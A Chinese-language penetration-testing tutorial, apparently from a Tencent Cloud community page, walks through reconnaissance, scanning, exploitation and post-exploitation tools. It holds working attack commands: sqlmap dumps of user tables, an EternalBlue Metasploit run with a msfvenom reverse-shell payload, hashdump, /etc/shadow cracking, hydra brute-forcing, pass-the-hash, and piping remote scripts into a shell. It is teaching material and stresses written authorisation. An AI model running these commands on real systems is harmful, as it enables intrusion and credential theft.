本文将详细介绍网络安全中最常用、最核心的工具使用方法,按照渗透测试标准流程组织,帮助新手快速上手。

🔍 阶段一:信息收集工具

1.1 子域名发现 - subfinder & amass

# subfinder 基本用法
subfinder -d target.com -o subdomains.txt
# 使用多个API源
subfinder -d target.com -all -o all_subs.txt

# amass 深度枚举
amass enum -d target.com -active -brute -o amass_results.txt
# 可视化结果
amass viz -d3 -dir amass_db

实战技巧:

  • 组合使用:subfinder快速扫描 + amass深度枚举

  • 使用-active参数进行DNS解析验证

  • 将结果导入到httpxhttprobe进行存活验证

1.2 端口扫描 - nmap(网络映射器)

# 基础扫描
nmap -sV -sC target.com
# -sV: 版本检测
# -sC: 使用默认脚本

# 全端口扫描(推荐)
nmap -p- -sV -T4 target.com -oN full_scan.txt
# -p-: 扫描所有65535个端口
# -T4: 加速模式

# 特定服务扫描
nmap -p 80,443,8080 -sV --script http-title target.com

# 使用NSE脚本
nmap -p 445 --script smb-vuln* target.com
nmap -p 80 --script http-sql-injection target.com

# UDP扫描(较慢)
nmap -sU -p 53,123,161 target.com

常用脚本分类:

  • vuln: 漏洞检测

  • auth: 身份验证相关

  • discovery: 服务发现

  • brute: 暴力破解

1.3 网络空间测绘 - FOFA & Shodan

FOFA语法示例:

# 搜索指定标题的网站
title="后台管理"
# 搜索特定服务
app="Apache-Tomcat"
# 搜索特定端口
port="8080"
# 搜索特定IP段
ip="192.168.1.0/24"
# 组合搜索
app="Jenkins" && country="CN"

Shodan CLI使用:

# 安装
pip install shodan
# 初始化
shodan init YOUR_API_KEY
# 搜索
shodan search apache 2.4.49
shodan count nginx
shodan download --limit 1000 results.json "port:22"

🎯 阶段二:漏洞扫描与发现

2.1 Burp Suite 专业使用技巧

安装配置流程:

# 1. 设置浏览器代理
# Firefox/Chrome: 127.0.0.1:8080

# 2. 安装证书
# 访问 http://burp 下载CA证书
# 导入到浏览器信任的根证书颁发机构

# 3. 配置作用域(Target → Scope)
# 添加目标:*.target.com

核心模块详解:

Proxy模块(拦截与修改):

  • 拦截模式

    • 快捷键:Ctrl+R发送到Repeater,Ctrl+I发送到Intruder

    • 右键菜单:Send to Comparer对比请求差异

  • 匹配与替换:自动修改特定请求(如添加头部)

Repeater模块(手动测试):

# 测试SQL注入
GET /search.php?q=test' AND '1'='1 HTTP/1.1

# 测试XSS
POST /comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded

comment=<script>alert(1)</script>

Intruder模块(自动化攻击):

攻击类型选择:
1. **Sniper**:一个参数多个Payload(最常用)
2. **Battering ram**:所有参数相同Payload
3. **Pitchfork**:多参数不同Payload列表
4. **Cluster bomb**:多参数Payload笛卡尔积

Payload设置:
- 简单列表:admin, administrator, root
- 数字范围:1-100
- 自定义迭代器

Scanner模块(自动化扫描):

# 主动扫描配置
扫描范围:仅目标作用域内
插入点:所有参数、头部、Cookie
扫描类型:主动 + 被动

2.2 Nuclei - 现代化漏洞扫描器

# 基本扫描
nuclei -u https://target.com -o results.txt

# 使用模板
nuclei -u https://target.com -t cves/ -t exposures/

# 批量扫描
nuclei -l urls.txt -o all_results.txt

# 自定义模板(YAML格式)
nuclei -u https://target.com -t custom-templates/

# 分类扫描
nuclei -u https://target.com -t vulnerabilities/
nuclei -u https://target.com -t misconfiguration/

# 并发控制(性能优化)
nuclei -u https://target.com -rate-limit 150 -c 50

模板结构示例:

id: example-vuln
info:
  name: Example Vulnerability
  severity: high
  description: Detect example vulnerability
requests:
  - method: GET
    path:
      - "{{BaseURL}}/admin"
    matchers:
      - type: word
        words:
          - "Admin Panel"
        part: body

2.3 专用漏洞扫描工具

SQL注入检测 - sqlmap

# 基本检测
sqlmap -u "http://target.com/page?id=1"

# 自动识别数据库
sqlmap -u "http://target.com/page?id=1" --dbs

# 获取数据
sqlmap -u "http://target.com/page?id=1" -D database -T users --dump

# POST请求测试
sqlmap -u "http://target.com/login" --data="user=admin&pass=test" --method POST

# 绕过WAF
sqlmap -u "http://target.com/page?id=1" --tamper=space2comment

# 风险控制(避免破坏)
sqlmap -u "http://target.com/page?id=1" --risk=1 --level=1

XSS检测 - XSStrike

# 基本扫描
python3 xsstrike.py -u "http://target.com/search?q=test"

# 爬虫模式
python3 xsstrike.py -u "http://target.com" --crawl

# 盲注检测
python3 xsstrike.py -u "http://target.com" --blind

配置文件扫描 - Nikto

# 基本扫描
nikto -h http://target.com

# 特定插件
nikto -h http://target.com -Plugins "apache_expect_xss"

# 输出格式
nikto -h http://target.com -Format xml -o report.xml

⚡ 阶段三:漏洞利用与渗透

3.1 Metasploit Framework(MSF)

# 启动
msfconsole

# 搜索模块
search type:exploit windows smb
search cve:2021-44228

# 使用模块
use exploit/windows/smb/ms17_010_eternalblue
# 查看选项
show options
# 设置参数
set RHOSTS 192.168.1.100
set LHOST 192.168.1.10
# 执行
exploit

# 生成Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o payload.exe

# 后渗透命令(meterpreter)
shell              # 获取系统shell
getuid             # 查看当前权限
hashdump           # 获取密码哈希
screenshot         # 截图
upload /tmp/file   # 上传文件
download file.txt  # 下载文件

3.2 密码破解工具

hydra(在线破解)

# SSH破解
hydra -l admin -P passwords.txt ssh://192.168.1.100

# HTTP表单破解
hydra -l admin -P passwords.txt http-post-form://target.com/login.php:"user=^USER^&pass=^PASS^":"Invalid"

# RDP破解
hydra -L users.txt -P passwords.txt rdp://192.168.1.100

# 控制速度(避免锁定)
hydra -l admin -P passwords.txt -t 32 -w 10 ssh://192.168.1.100

John the Ripper(离线破解)

# 破解shadow文件
unshadow /etc/passwd /etc/shadow > hashes.txt
john hashes.txt

# 指定破解模式
john --wordlist=rockyou.txt hashes.txt  # 字典模式
john --incremental hashes.txt          # 增量模式

# 显示结果
john --show hashes.txt

hashcat(GPU加速)



# 查看支持的模式
hashcat --help | grep -i "md5\|sha1\|ntlm"

# MD5破解
hashcat -m 0 -a 0 hashes.txt rockyou.txt

# NTLM破解
hashcat -m 1000 -a 0 ntlm_hashes.txt rockyou.txt

# 使用规则
hashcat -m 0 -a 0 hashes.txt rockyou.txt -r rules/best64.rule


🏗️ 阶段四:后渗透与权限维持


4.1 权限提升检查脚本


Linux - LinPEAS


# 下载并运行
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# 彩色输出(推荐)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash

# 保存结果
./linpeas.sh | tee linpeas_output.txt


Windows - WinPEAS


# PowerShell下载执行
iex (New-Object Net.WebClient).DownloadString('https://github.com/carlospolop/PEASS-ng/raw/master/winPEAS/winPEAS.ps1')


4.2 内网渗透工具


Responder(LLMNR/NBT-NS毒化)


# 监听并响应
sudo responder -I eth0 -v

# 分析模式
sudo responder -I eth0 -A

# 指定WPAD服务器
sudo responder -I eth0 -wFb


Impacket工具套件


# 获取SMB共享列表
python3 smbclient.py username:password@192.168.1.100

# 传递哈希攻击
python3 psexec.py -hashes LMHASH:NTHASH administrator@192.168.1.100

# Kerberos票据操作
python3 getTGT.py domain/user -hashes :NTHASH
python3 psexec.py domain/user@target -k -no-pass


📊 阶段五:报告与清理


5.1 报告生成工具


Dradis Framework


# 启动服务
dradis start

# 访问 http://localhost:3000
# 导入扫描结果
# 导出报告(HTML、Word、PDF)


Serpico


# 安装和运行
git clone https://github.com/SerpicoProject/Serpico.git
cd Serpico
# 按照README配置


5.2 自动化报告模板


# 渗透测试报告

## 执行摘要
- 测试日期: 2025-XX-XX
- 测试范围: *.target.com
- 风险等级: 高

## 发现漏洞
### 1. SQL注入 (高危)
**位置:** /search.php?q=参数
**风险:** 数据库信息泄露
**修复建议:** 使用参数化查询

### 2. XSS漏洞 (中危)
**位置:** 用户评论功能
**风险:** 窃取用户会话
**修复建议:** 输出编码

## 附录
### A. 扫描工具列表
- Nmap 7.94
- Burp Suite 2025.1
- Nuclei v3.0

### B. 测试数据
[此处附上截图和日志]


🚀 实战演练:完整渗透测试流程


# 1. 信息收集
subfinder -d target.com -o subs.txt
httpx -l subs.txt -o live_urls.txt
nmap -sV -sC -iL live_urls.txt -oA nmap_scan

# 2. 漏洞扫描
nuclei -l live_urls.txt -o nuclei_results.txt
nikto -h target.com -o nikto_report.html

# 3. 手动测试
# 使用Burp Suite逐个测试功能点

# 4. 漏洞利用
# 根据发现的漏洞选择合适的利用方式

# 5. 报告生成
# 整理所有发现,编写专业报告


⚠️ 重要注意事项


法律与道德


    
 
  1. 
  
    必须获得书面授权才能进行测试
    2. 
 
  2. 
  
    明确测试范围,不超出授权边界
    3. 
 
  3. 
  
    避免破坏性操作,除非明确允许
    4. 
 
  4. 
  
    保护发现的敏感数据,不得泄露
    5. 



最佳实践


    
 
  1. 
  
    工具只是辅助,理解原理更重要
    2. 
 
  2. 
  
    多工具交叉验证,避免误报
    3. 
 
  3. 
  
    记录所有操作,便于复现和报告
    4. 
 
  4. 
  
    保持工具更新,关注最新漏洞
    5. 



学习建议


    
 
  1. 
  
    从靶场开始:DVWA、WebGoat、HTB
    2. 
 
  2. 
  
    参与CTF比赛:锻炼实战能力
    3. 
 
  3. 
  
    阅读漏洞报告:HackerOne公开报告
    4. 
 
  4. 
  
    加入社区:交流学习经验
    5. 

 
  

        # web安全
      
        # 安全
      
  
 
 Logo 
腾讯云开发者社区
 
腾讯云面向开发者汇聚海量精品云计算使用和开发经验,营造开放的云计算技术生态圈。
 
 
  
更多推荐
  
 
Elasticsearch复杂数据类型终极指南:从入门到精通
 
Elasticsearch作为功能强大的搜索引擎,支持多种复杂数据类型,让开发者能够灵活处理各种结构化和非结构化数据。本文将带你全面了解Elasticsearch中的复杂数据类型,从基础概念到实际应用,助你轻松掌握数据建模的核心技巧。## 内部对象:构建层级化数据结构在Elasticsearch中,对象类型(Object)是最基础的复杂数据类型之一,用于表示具有嵌套关系的数据。例如,我们可
 
avatar 腾讯云开发者社区
 
 
终极指南:Flink SQL连接器版本管理从混乱到有序的升级之路
 
Apache Flink作为流处理领域的佼佼者,其SQL连接器的版本管理一直是开发者面临的核心挑战。本文将系统讲解Flink SQL连接器版本管理的最佳实践,帮助你轻松应对版本兼容性问题,实现从混乱到有序的升级之旅。## 连接器版本管理的常见痛点 😫在Flink应用开发中,连接器版本管理常常让开发者头疼不已。不同版本的连接器可能导致各种兼容性问题,例如API变更、功能差异甚至运行时错误。
 
avatar 腾讯云开发者社区
 
 
如何快速搭建Neon无服务器PostgreSQL:面向初学者的完整指南
 
Neon是一款革命性的无服务器PostgreSQL解决方案,它通过分离存储和计算层,实现了自动扩缩容、类代码式数据库分支以及零级扩展能力。本指南将帮助你从零开始搭建Neon开发环境,体验这款创新数据库的强大功能。## 准备工作:环境要求与依赖项在开始搭建Neon环境前,请确保你的系统满足以下要求:- Linux操作系统(推荐Ubuntu 20.04+或Debian 11+)- Git
 
avatar 腾讯云开发者社区